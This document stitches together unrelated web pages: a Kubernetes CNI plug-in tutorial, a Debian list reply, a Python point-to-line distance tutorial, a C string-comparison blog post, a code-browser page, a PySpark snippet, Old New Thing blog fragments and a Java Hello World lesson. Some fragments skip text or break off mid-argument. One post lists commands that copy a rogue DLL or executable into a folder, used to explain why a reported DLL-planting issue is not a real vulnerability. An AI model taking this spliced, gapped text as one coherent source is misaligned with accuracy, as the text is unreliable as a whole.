Getting Started with Kubernetes | Kubernetes CNIs and CNI Plug-ins
By Xiheng, Senior Technical Expert at Alibaba Cloud
The network architecture is a complex component of Kubernetes. The Kubernetes network model poses requirements for specific network functions. The industry has developed many network solutions for specific environments and requirements. A container network interface (CNI) allows you to easily configure a container network when creating or destroying a container. This article describes how classic network plug-ins work and how to use CNI plug-ins.
What Is a CNI?
A CNI is a standard network implementation interface in Kubernetes. Kubelet calls different network plug-ins through the CNI to implement different network configuration methods. The CNI specification is implemented by plug-ins such as Calico, Flannel, Terway, Weave Net, and Contiv.
How to Use CNIs in Kubernetes
Kubernetes determines which CNI to use based on the CNI configuration file.
The CNI usage instructions are as follows:
(1) Configure the CNI configuration file (/etc/cni/net.d/xxnet.conf) on each node, where xxnet.conf indicates the name of a network configuration file.
(2) Install the binary plug-in that the CNI configuration file declares on each node.
(3) After a pod is created on a node, Kubelet runs the CNI plug-in installed in the previous two steps based on the CNI configuration file.
(4) This completes the pod network configuration.
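As an illustration of steps (1) and (2), a minimal CNI configuration file for the standard bridge plug-in might look like the following (all field values here are illustrative, not taken from the article):

{
  "cniVersion": "0.3.1",
  "name": "mynet",
  "type": "bridge",
  "bridge": "cni0",
  "ipam": {
    "type": "host-local",
    "subnet": "172.16.0.0/24"
  }
}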
The following figure shows the detailed process.
When a pod is created in a cluster, the API server writes the pod configuration to the cluster, and a control component such as the scheduler assigns the pod to a specific node. After Kubelet on that node detects the creation of this pod, it performs the creation actions locally. When it sets up the network, Kubelet reads the configuration file in the configuration directory, which declares the plug-in to use. Kubelet then executes the binary file of the CNI plug-in, and the CNI plug-in enters the pod's network namespace to configure the pod network. After the pod network is configured, Kubelet completes the pod creation and the pod goes online.
The preceding process seems complicated and involves multiple steps, such as configuring the CNI configuration file and installing the binary plug-in.
However, many CNI plug-ins can be installed in one click and are easy to use. The following figure shows how to use the Flannel plug-in: applying Flannel's deployment template with kubectl apply automatically installs the configuration file and binary file on each node.
Then, all CNI plug-ins required by the cluster are installed.
Many CNI plug-ins provide a one-click installation script. You do not need to concern yourself with the internal configuration of Kubernetes or how the APIs are called.
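For example, installing Flannel typically amounts to applying its template with a single command; a sketch (the manifest URL is illustrative and version-dependent):

kubectl apply -f https://raw.githubusercontent.com/flannel-io/flannel/master/Documentation/kube-flannel.yml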
Select an Appropriate CNI Plug-in
The community provides many CNI plug-ins, such as Calico, Flannel, and Terway. Before selecting an appropriate CNI plug-in in a production environment, let’s have a look at the different CNI implementation modes.
Select an implementation mode based on a specific scenario, and then select an appropriate CNI plug-in.
CNI plug-ins are divided into three implementation modes: Overlay, Routing, and Underlay.
- In Overlay mode, a container is independent of the host’s IP address range. During cross-host communication, tunnels are established between hosts and all packets in the container CIDR block are encapsulated as packets exchanged between hosts in the underlying physical network. This mode removes the dependency on the underlying network.
- In Routing mode, hosts and containers belong to different CIDR blocks. Cross-host communication is implemented through routing. No tunnels are established between different hosts for packet encapsulation. However, route interconnection partially depends on the underlying network. For example, the hosts may need to be reachable from one another at Layer 2 of the underlying network.
- In Underlay mode, containers and hosts are located at the same network layer and share the same position. Network interconnection between containers depends on the underlying network. Therefore, this mode is highly dependent on the underlying capabilities.
Select an implementation mode based on your environment and needs. Then, select an appropriate CNI plug-in in this mode. How do we determine the implementation mode of each CNI plug-in available in the community? How do we select an appropriate CNI plug-in? These questions can be answered by considering the following aspects:
Environmental Restrictions
Different environments provide different underlying capabilities.
- A virtual environment, such as OpenStack, imposes many network restrictions. For example, machines cannot directly access each other through a Layer 2 protocol; only packets with Layer 3 features, such as IP addresses, are forwarded; and a host can only use specified IP addresses. For such a restricted underlying network, you can only select plug-ins in Overlay mode, such as Flannel-VXLAN, Calico-IPIP, and Weave.
- A physical machine environment imposes few restrictions on the underlying network. For example, Layer 2 communication can be implemented within a switch. In such a cluster environment, you can select plug-ins in Underlay or Routing mode. In Underlay mode, you can insert multiple network interface controllers (NICs) directly into a physical machine, or virtualize hardware on NICs. In Routing mode, routes are established through a Linux routing protocol. This avoids the performance degradation caused by VXLAN encapsulation. In this environment, you can select plug-ins such as Calico-BGP, Flannel-HostGW, and Sriov.
- A public cloud environment is a type of virtual environment and places many restrictions on the underlying capabilities. However, each public cloud adapts containers for improved performance and may provide APIs to configure additional NICs or routing capabilities. If you run businesses on the public cloud, we recommend that you select the CNI plug-ins provided by a public cloud vendor for compatibility and optimal performance. For example, Alibaba Cloud provides the high-performance Terway plug-in.
After considering the environmental restrictions, you may have an idea of which plug-ins can be used and which ones cannot. Then, consider your functional requirements.
Functional Requirements
- First, consider security requirements.
Kubernetes supports NetworkPolicy, allowing you to configure rules that control, for example, whether inter-pod access is allowed. Not every CNI plug-in supports NetworkPolicy declarations. If you require NetworkPolicy support, you can select Calico or Weave (see the example policy after this list).
- Second, consider the need to interconnect resources within and outside a cluster.
Applications deployed on virtual machines (VMs) or physical machines cannot be migrated all at once to a containerized environment. Therefore, it is necessary to configure IP address interconnection between VMs or physical machines and containers by interconnecting them or deploying them at the same layer. You can select a plug-in in Underlay mode. For example, the Sriov plug-in allows pods and legacy VMs or physical machines to run at the same layer. You can also use the Calico-BGP plug-in. Though containers are in a different CIDR block from the legacy VMs or physical machines, you can use Calico-BGP to advertise BGP routes to original routers, allowing the interconnection of VMs and containers.
- Lastly, consider Kubernetes’ service discovery and load balancing capabilities.
Service discovery and load balancing are services of Kubernetes. Not all CNI plug-ins provide these two capabilities. For many plug-ins in Underlay mode, a pod's NIC is the underlay hardware itself, or a hardware-virtualized function inserted into the container. Therefore, the pod's traffic does not pass through the host's network namespace, and the rules that kube-proxy configures on the host cannot be applied to it.
In this case, the plug-in cannot access the service discovery capabilities of Kubernetes. If you require service discovery and load balancing, select a plug-in in Underlay mode that supports these two capabilities.
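As a concrete illustration of the NetworkPolicy support mentioned in the list above, a minimal policy that allows pods labeled app: web to reach pods labeled app: db, and blocks other pod ingress, might look like this (all names and labels are illustrative):

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-web-to-db
  namespace: default
spec:
  podSelector:
    matchLabels:
      app: db
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: web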
Consideration of functional requirements will narrow your plug-in choices. If you still have three or four plug-ins to choose from, you can consider performance requirements.
Performance Requirements
Pod performance can be measured in terms of pod creation speed and pod network performance.
- Pod Creation Speed
For example, when you need to scale out 1,000 pods during a business peak, the CNI plug-in must create and configure 1,000 network resources. A plug-in in Overlay or Routing mode creates pods quickly because it implements virtualization on the machine itself, so only kernel interfaces need to be called. A plug-in in Underlay mode must create underlying network resources, which slows down pod creation. Therefore, we recommend that you select a plug-in in Overlay or Routing mode when you need to quickly scale out pods or create many pods.
- Pod Network Performance
The network performance of pods is measured by metrics such as inter-pod network forwarding, network bandwidth, packets per second (PPS), and latency. A plug-in in Overlay mode provides lower performance than plug-ins in Underlay and Routing modes because it implements virtualization on nodes and encapsulates packets, which costs packet header overhead and CPU cycles. Therefore, do not select a plug-in in Overlay mode if you require high network performance in scenarios such as machine learning and big data. We recommend that you select a CNI plug-in in Underlay or Routing mode instead.
You can select an appropriate network plug-in by considering the preceding three requirements.
How to Develop Your Own CNI Plug-in
The plug-ins provided by the community may not meet your specific requirements. For example, only the VXLAN plug-in in Overlay mode can be used in Alibaba Cloud. This plug-in provides relatively poor performance and cannot meet some business requirements of Alibaba Cloud. In response, Alibaba Cloud developed the Terway plug-in.
You can develop a CNI plug-in if none of the plug-ins in the community are suitable for your environment.
A CNI plug-in is implemented as follows:
(1) A binary CNI plug-in is used to configure the NIC and IP address of a pod. This is equivalent to connecting a network cable to the pod, which has an IP address and NIC.
(2) A daemon process is used to manage the network connections between pods. This step connects pods to the network and enables them to communicate with each other.
Connect a Network Cable to a Pod
A network cable can be connected to a pod as follows:
Prepare an NIC for the Pod
You can connect one end of a veth pair to the pod's network namespace and the other end to the host's network namespace. In this way, the namespaces of the pod and the host are connected.
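Conceptually, the plug-in does something similar to the following iproute2 commands (a hand-rolled sketch; the namespace name ns1 and the interface names are illustrative):

# create a veth pair; veth0 will become the pod's NIC, veth1 stays on the host
ip link add veth0 type veth peer name veth1
# move one end into the pod's network namespace (here called ns1)
ip link set veth0 netns ns1
# bring up the host end
ip link set veth1 up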
Allocate an IP Address to the Pod
Ensure that the IP address allocated to the pod is unique in the cluster.
When creating a cluster, we specify a CIDR block for each pod and allocate a CIDR block based on each node. As shown on the right in the preceding figure, the 172.16 CIDR block is created. We allocate a CIDR block suffixed with /24 by node. This avoids conflicts between the IP addresses on nodes. Each pod is allocated an IP address from the CIDR block of a specific node in sequence. For example, pod 1 is allocated 172.16.0.1, and pod 2 is allocated 172.16.0.2. This ensures that each node is in a different CIDR block and allocates a unique IP address to each pod.
In this way, each pod has a unique IP address in the cluster.
Configure the IP Address and Route of the Pod
- Step 1: Configure the allocated IP address to the pod’s NIC.
- Step 2: On the pod's NIC, configure a route for the cluster's CIDR block and a default route, so that traffic destined for the cluster and traffic destined for the Internet both leave through this NIC.
- Step 3: Configure the route destined for the pod’s IP address on the host and direct the route to the veth1 virtual NIC at the peer end of the host. In this way, traffic can be routed from the pod to the host, and access traffic from the host to the pod’s IP address can be routed to the peer end of the pod’s NIC.
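Continuing the iproute2 sketch from above, the three steps might look like this (all addresses are illustrative):

# inside the pod's namespace: assign the allocated IP and set up routes
ip netns exec ns1 ip addr add 172.16.0.1/24 dev veth0
ip netns exec ns1 ip link set veth0 up
ip netns exec ns1 ip route add default dev veth0
# on the host: direct traffic for the pod's IP to the host end of the veth pair
ip route add 172.16.0.1/32 dev veth1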
Connect the Pod to the Network
After connecting a network cable to the pod, you can allocate an IP address and route table to the pod. Next, you can enable communication between pods by configuring each pod’s IP address to be accessible in the cluster.
Pods can be interconnected in the CNI daemon process as follows:
- The CNI daemon process running on each node learns the IP address of each pod in the cluster and the node where that pod is located. It does so by watching the Kubernetes API server, which notifies each daemon when nodes and pods are created.
- Then, the daemon process configures network connection in two steps:
- (1) The daemon process creates a channel to each node of the cluster. This channel is an abstract concept and implemented by the Overlay tunnel, the Virtual Private Cloud (VPC) route table in Alibaba Cloud, or the BGP route in your own data center.
- (2) The IP addresses of all pods are associated with the created channel. Association here is also an abstract concept and implemented through Linux routing, a forwarding database (FDB) table, or an Open vSwitch (OVS) flow table. Through Linux routing, you can configure a route from an IP address to a specific node. An FDB table is used to configure a route from a pod’s IP address to the tunnel endpoint of a node through an Overlay network. A flow table provided by OVS is used to configure a route from a pod’s IP address to a node.
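As a concrete example of the association step, an Overlay plug-in that uses VXLAN might program an FDB entry mapping a pod's MAC address to the VXLAN tunnel endpoint of the node that hosts it (values are illustrative):

bridge fdb append 00:11:22:33:44:55 dev vxlan0 dst 192.168.1.20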
Summary
Let’s summarize what we have learned in this article.
(1) How to select an appropriate CNI plug-in when building a Kubernetes cluster in your environment.
(2) How to develop a CNI plug-in when the CNI plug-ins available in the community cannot meet your requirements.
Source: https://alibaba-cloud.medium.com/getting-started-with-kubernetes-kubernetes-cnis-and-cni-plug-ins-10c33e44ac88 (CC-MAIN-2022-33, refinedweb, 2,381 words, Flesch reading ease 55.34)
Rene Engelhard wrote on Thursday, 09 September 2010:

> On Wed, Sep 08, 2010 at 01:22:24PM -0700, Don Armstrong wrote:
> > 1: It's certainly a bug in the backported package using debhelper
> > improperly; it may also be an additional wishlist bug in debhelper.
>
> I disagree, the backported package uses debhelper correctly. Especially
> if you don't use the backported debhelper, too, you just have to rely
> on that debhelper would do it correctly.
>
> Or do you really want debian/rules checking which debhelper you use
> and add postinst/postrm snippets then after it noticed that dh_desktop
> in theory should add something (because this is lenny) but doesn't?
>
> The debhelper backport simply should have made debhelper working in lenny
> by reverting the change.
>
> For that matter, I have this in debian/rules already:
>
> ifeq "$(LENNY_BACKPORT)" "y"
>     dh_desktop -s
> endif
>
> Because dh_desktop is not needed anymore on sarge/sid but on lenny.
> But lenny-backports' debhelper doesn't do anything here like the
> version in sarge/sid (whereas lenny's version does, and that's what is
> the expected environment inside lenny)

I'll fix that.

Alex
Source: https://lists.debian.org/debian-devel/2010/09/msg00201.html (CC-MAIN-2017-17, refinedweb, 187 words, Flesch reading ease 58.01)
This tutorial presents a relatively straightforward explanation of how the shortest distance between a point and a line can be calculated. Readers who have searched the internet for information on this topic know there is no shortage of confusing, and often confused, "explanations" about point-to-line calculations.
Computer graphics typically deals with lines in 3D space as those defined by points
that provide the coordinates of the start and end of a line. This tutorial refers to such
lines as "line segments". The shortest distance between a point and a line segment may
be the length of the perpendicular connecting the point and the line or it may be
the distance from either the start or end of the line.
For example, point P in figure 1B is bounded by the two gray perpendicular
lines and as
such the shortest distance is the length of the perpendicular green line d2. The points in
figures 1A and 1C are outside their respective starting and ending perpendiculars and
consequently the shortest distance must be calculated from either the start or the end
of the line segment.
Figure 1
The Python procedure presented in listing 1 primarily depends on the use of the vector dot product to determine if the shortest distance is d2, case B, or d1 or d3, shown in cases A and C. The procedure pnt2line uses a few vector procs that are implemented in vectors.py.
Figures 4 to 8 illustrate each calculation performed by pnt2line. Consider the point and the line segment shown in figures 2 and 3.
Line: start (1, 0, 2), end (4.5, 0, 0.5)
Point: pnt (2, 0, 0.5)
Figure 2
The Y coordinates of the line and point are zero and as such
both lie on the XZ plane.
Figure 3
Convert the line and point to vectors. The coordinates of the
vector representing the point are relative to the start of the
line.
line_vec = vector(start, end) # (3.5, 0, -1.5)
pnt_vec = vector(start, pnt) # (1, 0, -1.5)
Figure 4
Scale both vectors by the length of the line: convert the line vector to a unit vector, and divide the point vector by the line length.
line_len = length(line_vec) # 3.808
line_unitvec = unit(line_vec) # (0.919, 0.0, -0.394)
pnt_vec_scaled = scale(pnt_vec, 1.0/line_len) # (0.263, 0.0, -0.393)
Figure 5
Calculate the dot product of the scaled vectors. The value corresponds
to the distance, shown in black, along the unit vector to the
perpendicular, shown in green.
t = dot(line_unitvec, pnt_vec_scaled) # 0.397
Figure 6
Clamp 't' to the range 0 to 1.
Scale the line vector by 't' to find the nearest location, shown in
green, to the
end of the point vector. Calculate the distance from the nearest
location to the end of the point vector.
if t < 0.0:
    t = 0.0
elif t > 1.0:
    t = 1.0
nearest = scale(line_vec, t)        # (1.388, 0.0, -0.595)
dist = distance(nearest, pnt_vec)   # 0.985
Figure 7
Translate the 'nearest' point relative to the start of the line.
This ensures its coordinates "match" those of the line.
nearest = add(nearest, start) # (2.388, 0.0, 1.405)
Figure 8
Listing 1 (distances.py)
from vectors import *
# Given a line with coordinates 'start' and 'end' and the
# coordinates of a point 'pnt' the proc returns the shortest
# distance from pnt to the line and the coordinates of the
# nearest point on the line.
#
# 1 Convert the line segment to a vector ('line_vec').
# 2 Create a vector connecting start to pnt ('pnt_vec').
# 3 Find the length of the line vector ('line_len').
# 4 Convert line_vec to a unit vector ('line_unitvec').
# 5 Scale pnt_vec by line_len ('pnt_vec_scaled').
# 6 Get the dot product of line_unitvec and pnt_vec_scaled ('t').
# 7 Ensure t is in the range 0 to 1.
# 8 Use t to get the nearest location on the line to the end
# of vector pnt_vec_scaled ('nearest').
# 9 Calculate the distance from nearest to pnt_vec_scaled.
# 10 Translate nearest back to the start/end line.
# Malcolm Kesson 16 Dec 2012
def pnt2line(pnt, start, end):
    line_vec = vector(start, end)
    pnt_vec = vector(start, pnt)
    line_len = length(line_vec)
    line_unitvec = unit(line_vec)
    pnt_vec_scaled = scale(pnt_vec, 1.0/line_len)
    t = dot(line_unitvec, pnt_vec_scaled)
    if t < 0.0:
        t = 0.0
    elif t > 1.0:
        t = 1.0
    nearest = scale(line_vec, t)
    dist = distance(nearest, pnt_vec)
    nearest = add(nearest, start)
    return (dist, nearest)
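The tutorial links to vectors.py rather than reproducing it; a minimal sketch of the procs that pnt2line depends on, assuming points and vectors are 3-component tuples, might look like this:

import math

def vector(b, e):
    # vector from point b to point e
    return (e[0] - b[0], e[1] - b[1], e[2] - b[2])

def length(v):
    return math.sqrt(v[0]**2 + v[1]**2 + v[2]**2)

def unit(v):
    l = length(v)
    return (v[0]/l, v[1]/l, v[2]/l)

def scale(v, s):
    return (v[0]*s, v[1]*s, v[2]*s)

def dot(a, b):
    return a[0]*b[0] + a[1]*b[1] + a[2]*b[2]

def add(a, b):
    return (a[0]+b[0], a[1]+b[1], a[2]+b[2])

def distance(a, b):
    # distance between points a and b
    return length(vector(a, b))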
Figure 9 shows 150 points in random locations and their "connections" to
their nearest location on a line.
Figure 9
Source: http://fundza.com/vectors/point2line/index.html (CC-MAIN-2021-49, refinedweb, 756 words, Flesch reading ease 67.45)
#include <stdio.h>

int main() {
    char *mytext;
    mytext = "Help";
    if (mytext == "Help") {
        printf("This should raise a warning");
    }
    return 0;
}

Trying to compile this very simple C program, which at first sight many would probably say is correct, will result in this:
$ gcc test1.c -Wall
test1.c: In function ‘main’:
test1.c:6:14: warning: comparison with string literal results in unspecified behavior
So, even though we had such an easy program, line 6 seems to be an issue for us:
if (mytext == "Help") {
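The fix, not shown in this excerpt, is to compare the string contents with strcmp rather than comparing pointers; a minimal corrected sketch:

#include <stdio.h>
#include <string.h>

int main() {
    char *mytext = "Help";
    if (strcmp(mytext, "Help") == 0) { /* compares contents, not pointer values */
        printf("No warning here");
    }
    return 0;
}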
Very useful! Thanks.
Hi
Excellent, look forward to more of these 🙂
Thank you; such a series will be a big help.
The wrong example could be

#include <stdio.h>

int main() {
    const char mytext[] = "Help";
    if (mytext == "Help") {
        printf("This should raise a warning");
    }
    return 0;
}
To avoid making Ulrich Drepper cry 😉 section 2.4.1
But sure, the series is good to have. And is badly needed for some esoteric topics as strict aliasing.
Note that strcmp is easily misused and will certainly lead to bugs. I suggest you define a macro like

#define streq(a,b) (strcmp((a),(b)) == 0)

...or an inline function, as macros are pretty evil 😉
Keep going!
Sure.. but: do we want to have our packager army introduce the most sophisticated and complex code into any upstream project?
The target audience for his series is mostly packagers. Some of them are coders, many are not, some would like to learn, some don’t care and give up.
It’s nice to point out nice nifty tricks. But honestly, I doubt we would achieve a lot of packagers taking care of the errors, if it goes too far.
Yeah years after this is still helpful 🙂
Thanks for the post.
Source: http://dominique.leuenberger.net/blog/2011/03/how-to-fix-brp-and-rpmlint-warnings-today-expression-compares-a-char-pointer-with-a-string-literal/ (CC-MAIN-2018-22, refinedweb, 291 words, Flesch reading ease 72.05)
#include "pluginapi.h"
Go to the source code of this file.
PDB document header (78 bytes total):
version (2 bytes): 0x0002 if data is compressed, 0x0001 if uncompressed
spare (2 bytes): purpose unknown (set to 0 on creation)
length (4 bytes): total length of text before compression
records (2 bytes): number of text records
record_size (2 bytes): maximum size of each record (usually 4096; see below)
position (4 bytes): currently viewed position in the document
sizes (2*records bytes): record size array
Definition at line 78 of file pdbim.h.
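Laid out as a C struct, the header described above might look like the following sketch (the actual definition in pdbim.h may differ in names and in how the trailing array is declared):

#include <stdint.h>

/* PDB document header; the fixed part is followed by a record size
   array of 2*records bytes (78 bytes total per the description above). */
struct PdbDocHeader {
    uint16_t version;     /* 0x0002 if data is compressed, 0x0001 if uncompressed */
    uint16_t spare;       /* purpose unknown, set to 0 on creation */
    uint32_t length;      /* total length of text before compression */
    uint16_t records;     /* number of text records */
    uint16_t record_size; /* maximum size of each record, usually 4096 */
    uint32_t position;    /* currently viewed position in the document */
    uint16_t sizes[];     /* record size array, 2*records bytes */
};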
Returns the string with importer description.
Definition at line 10 of file csvim.cpp.
{ return QObject::tr("Comma Separated Value Files"); }
Source: https://sourcecodebrowser.com/scribus-ng/1.3.4.dfsgplus-psvn20071115/pdbim_8h.html (CC-MAIN-2017-51, refinedweb, 114 words, Flesch reading ease 64.3)
from pyspark.sql.functions import monotonically_increasing_id
df.withColumn("id", monotonically_increasing_id()).show()
Verify that the second argument of df.withColumn is monotonically_increasing_id() (a call), not monotonically_increasing_id (a bare function reference).
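For context, a self-contained sketch (assuming a local SparkSession; the DataFrame contents are illustrative):

from pyspark.sql import SparkSession
from pyspark.sql.functions import monotonically_increasing_id

spark = SparkSession.builder.master("local[*]").appName("ids").getOrCreate()
df = spark.createDataFrame([("a",), ("b",), ("c",)], ["value"])

# adds a unique, monotonically increasing (not necessarily consecutive) id per row
df.withColumn("id", monotonically_increasing_id()).show()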
Source: https://www.edureka.co/community/51678/primary-keys-in-apache-spark?show=51686 (CC-MAIN-2022-27, refinedweb, 146 words, Flesch reading ease 54.9)
A customer observed that when their service logs multiple events in rapid succession, they sometimes show up out of order in Event Viewer. Specifically, events that all occur within the same second are sometimes mis-ordered relative to each other. Is this expected?
Events in the event viewer are timestamped only to one-second resolution. The EVENTLOGRECORD structure reports time in UNIX format, namely, seconds since January 1, 1970.
Experimentation suggested that the Event Viewer sorts
events by timestamp, but it does not use a stable sort,
so multiple events that occur within the same second
end up in an unpredictable order.
Not much you can do about it,
but at least now you know that you're not hallucinating.
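For reference, the one-second resolution is visible in the structure itself; a small sketch of pulling the timestamp out of a record you have already read with ReadEventLog (error handling omitted):

#include <windows.h>
#include <stdio.h>
#include <time.h>

void PrintEventTime(const EVENTLOGRECORD *record)
{
    /* TimeGenerated holds seconds since January 1, 1970 (UTC),
       so two events within the same second compare as equal */
    time_t t = (time_t)record->TimeGenerated;
    printf("Event generated at %s", ctime(&t));
}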
By default, the Windows 8 touch keyboard does not appear automatically
when focus is placed on an edit control in a desktop program.
To change the behavior for your program, just use
this one weird trick:
HRESULT EnableTouchKeyboardFocusTracking()
{
    ComPtr<IInputPanelConfiguration> configuration;
    HRESULT hr = CoCreateInstance(__uuidof(InputPanelConfiguration), nullptr,
                                  CLSCTX_INPROC_SERVER, IID_PPV_ARGS(&configuration));
    if (SUCCEEDED(hr)) {
        hr = configuration->EnableFocusTracking();
    }
    return hr;
}
You create an instance of the InputPanelConfiguration object and ask it to enable focus tracking. This is a per-process setting, and once set, it cannot be unset.
Let's use this function in a Little Program so you can
play with it.
Most of the work in setting up the program is creating
two controls: an edit control and a button.
If I had just one control,
then you wouldn't be able to see how the keyboard automatically
appears and disappears when focus moves between an edit
control and some other type of control.
Remember that Little Programs do little to no error checking.
Start with
the scratch program and make these changes:
#define STRICT
#include ...
#include <shobjidl.h>
#include <inputpanelconfiguration.h>
#include <wrl\client.h>
#include <wrl\event.h>

using namespace Microsoft::WRL;

HINSTANCE g_hinst;   /* This application's HINSTANCE */
HWND g_hwndChild;    /* Optional child window */
HWND g_hwndButton;
HWND g_hwndLastFocus;

void
DoLayout(HWND hwnd, int cx, int cy)
{
    if (g_hwndChild) {
        MoveWindow(g_hwndChild, 0, 0, cx - 100, cy, TRUE);
    }
    if (g_hwndButton) {
        MoveWindow(g_hwndButton, cx - 100, 0, 100, 50, TRUE);
    }
}

void
OnSize(HWND hwnd, UINT state, int cx, int cy)
{
    DoLayout(hwnd, cx, cy);
}

BOOL
OnCreate(HWND hwnd, LPCREATESTRUCT lpcs)
{
    g_hwndChild = CreateWindow(TEXT("edit"), nullptr,
        WS_CHILD | WS_VISIBLE | WS_BORDER | ES_MULTILINE,
        0, 0, 100, 100, hwnd, nullptr, g_hinst, 0);
    g_hwndButton = CreateWindow(TEXT("button"), TEXT("Send"),
        WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON,
        0, 0, 100, 100, hwnd, nullptr, g_hinst, 0);
    EnableTouchKeyboardFocusTracking();
    return TRUE;
}

// OnActivate incorporated by reference.
HANDLE_MSG(hwnd, WM_ACTIVATE, OnActivate);

BOOL
InitApp(void)
{
    ...
    wc.hbrBackground = (HBRUSH)(COLOR_APPWORKSPACE + 1);
    ...
}
We position the edit control on the left-hand side of the window and put the button in the upper right corner. We enable focus tracking on the touch keyboard, and just to make it easier to see where the edit control is, we give the frame the app-workspace color.
Although we summon the touch keyboard when focus enters
the edit control,
we do nothing to prevent the keyboard from covering what the
user is typing.
This is one of the reasons that the touch keyboard does not
appear automatically when focus is placed in an edit control
of a desktop program.
It would end up covering the edit control the user is trying to type into!
We'll work on fixing this problem next week.
A customer asked, "Under what conditions can SetFocus crash? (The full dump file can be found on <location>. The password is <xyzzy>.)"
Indeed, what the customer suspected is what happened,
confirmed by the dump file provided.
The code behind the window procedure got unloaded. UserCallWinProcCheckWow is trying to call the window procedure, but instead it took an exception. The address doesn't match any loaded or recently-unloaded module, probably because it was a dynamically generated thunk, like the ones ATL generates.
There isn't much you can do to defend against this.
Even if you manage to detect the problem and avoid calling
SetFocus in this problematic case,
all you're doing is kicking the can further down the road.
Your program will crash the next time the window
receives a message, which it eventually will.
(For example, the next time the user changes a system setting and the WM_SETTINGCHANGE message is broadcast to all top-level windows, or the user plugs in an external monitor and the WM_DISPLAYCHANGE message is broadcast to all top-level windows.)
Basically, that other component pulled the pin on
a grenade and handed it to your thread.
That grenade is going to explode sooner or later.
The only question is when.
Such is the danger of
giving your application an extension model that
allows arbitrary third party code to run.
The third party code can do good things
to make your program more useful,
but it can also do bad things to make
your program crash..
I am not a selection reader, but I do click in the
document with some regularity. I do this for two reasons..
A security report was received that went something like this:
The XYZ application does not load its DLLs securely.
Create a directory, say, C:\Vulnerable, and copy XYZ.EXE and a rogue copy of ABC.DLL into that directory. When C:\Vulnerable\XYZ.EXE is run, the XYZ program will load the rogue DLL instead of the official copy in the System32 directory. This is a security flaw in the XYZ program.
Recall that the directory is the application bundle. The fact that the XYZ.EXE program loads ABC.DLL from the application directory rather than the System32 directory is not surprising, because ABC.DLL has been placed inside the XYZ.EXE program's trusted circle.
But what is the security flaw, exactly?
Let's identify
the attacker,
the victim,
and the attack scenario.
The attacker is
the person who created the directory with the copy of
XYZ.EXE and the rogue ABC.DLL.
The victim is whatever poor sap runs the XYZ.EXE
program from the custom directory instead of from
its normal location.
The attack scenario is
copy C:\Windows\System32\XYZ.EXE C:\Vulnerable\XYZ.EXE
copy rogue.dll C:\Vulnerable\ABC.DLL
When the victim runs
C:\Vulnerable\XYZ.EXE,
the rogue DLL gets loaded,
and the victim is pwned.
But the victim was already pwned even before getting
to that point!
Because the victim ran
C:\Vulnerable\XYZ.EXE.
A much simpler attack is to do this:
copy pwned.exe C:\Vulnerable\XYZ.EXE
The rogue ABC.DLL is immaterial.
All it does is
crank up the degree of difficulty
without changing the fundamental issue:
If you can trick a user into running a program you control,
then the user is pwned.
Note that the real copy of XYZ.EXE in the System32
directory is unaffected.
The attack doesn't affect
users which run the real copy.
And since C:\Vulnerable isn't on the default PATH, the only way to get somebody to run the rogue copy is to trick them into running the wrong copy.
It's like saying that there's a security flaw in Anna Kournikova
because people can create things that look like Anna Kournikova
and trick victims into running it..
__ENABLE_EXPERIMENTAL_TADPOLE_OPERATORS
Start with the identity for two's complement negation

-x = ~x + 1

then move the -x to the right hand side and the ~x to the left hand side:

-~x = x + 1

If that was too fast for you, we can do it a different way: start with the identity for two's complement negation

-x = ~x + 1

subtract 1 from both sides

-x - 1 = ~x

and finally, negate both sides

x + 1 = -~x

To get the decrement tadpole operator, start with

-x = ~x + 1

and substitute x = -y:

-(-y) = ~-y + 1

then subtract 1 from both sides and simplify -(-y) to y:

y - 1 = ~-y
Update: Justin Olbrantz (Quantam) and Ben Voigt provide a simpler derivation, starting with the identities for two's complement negation:

-x = ~x + 1
~x = -x - 1

Substitute x = ~y into the first identity and x = -y into the second:

-~y = ~(~y) + 1 = y + 1
~-y = -(-y) - 1 = y - 1
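A quick sanity check of both identities in plain C, since they are just compositions of the standard unary operators on two's complement integers:

#include <stdio.h>

int main(void)
{
    int x = 41;
    printf("-~x = %d\n", -~x); /* prints 42, i.e. x + 1 */
    printf("~-x = %d\n", ~-x); /* prints 40, i.e. x - 1 */
    return 0;
}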
As I was heading home at the end of the day,
I ran into one of my colleagues who was also going home,
and he was carrying a Star Wars-themed metal lunchbox
similar to
this one.
For those who didn't grow up in the United States,
these metal lunchboxes are the type of things elementary
school children use to carry their lunch to school.
I remarked,
"Nice lunchbox."
My colleague explained,
"Yeah, I sort of ended up as the lunchbox guy.
It started when somebody gave me a lunchbox as a
semi-humorous gift,
and I kept it on my shelf.
Then other people saw that I had a metal lunchbox
and concluded,
'Oh, he must collect metal lunchboxes,'
and they started giving me metal lunchboxes.
And before I knew it,
I became an unwitting collector of metal lunchboxes."
The same thing happened to a different colleague of mine.
As his first birthday after he got married approached,
his new in-laws asked his wife,
"What does Bob like?"
His wife shrugged.
"I dunno.
He kind of likes Coca-Cola?"
That year, he got a vintage Coca-Cola serving tray.
The next year, he got a Coca-Cola clock.
And then Coca-Cola drinking glasses.
And so on.
Eventually, he had to
ask his wife to tell her family,
"Okay, you can stop now.
Bob doesn't like Coca-Cola that much."
Source: https://blogs.msdn.com/b/oldnewthing/default.aspx?Redirected=true&PageIndex=3 (CC-MAIN-2015-27, refinedweb, 1,626 words, Flesch reading ease 56.05)
Welcome to java tutorial series. In this lesson, you will learn to create your first Java program.
In Java, all source code is written in plain text files saved with the .java extension. The Java compiler is used to compile the source code (.java file) into a binary file with the .class extension. On the command prompt, the javac command is used to invoke the Java compiler. This .class file does not contain code that is native to your processor; instead it contains bytecode that is converted into machine-specific binary code by the Java Virtual Machine.
You can write a Hello World program as your first Java program. To write the Hello World program you need a simple text editor like Notepad, and make sure the JDK is already installed on your machine for compiling and running the program.
Here is the complete video tutorial.
Write the following code, given on the screen, in Notepad and save it as a HelloWorld.java file.
Here is the complete code of the HelloWorld.java program.
public class HelloWorld {
    public static void main(String[] args) {
        System.out.println("Hello World!");
    }
}
You can save the above file, e.g. HelloWorld.java, in any drive of your hard disk. Remember the location where you save your file; in this example we have saved the file in the C:\javatutorial\example directory. Save the file with the .java extension, e.g. HelloWorld.java.
Using javac, you can compile the Java source code into bytecode, and using the java command, you can run the program as shown on your screen. Compiling the program generates the .class file; in our case HelloWorld.class will be generated.
You should open the command prompt and go to the directory where the file is saved. To compile, use the javac HelloWorld.java command, and to execute the program, use the java HelloWorld command.
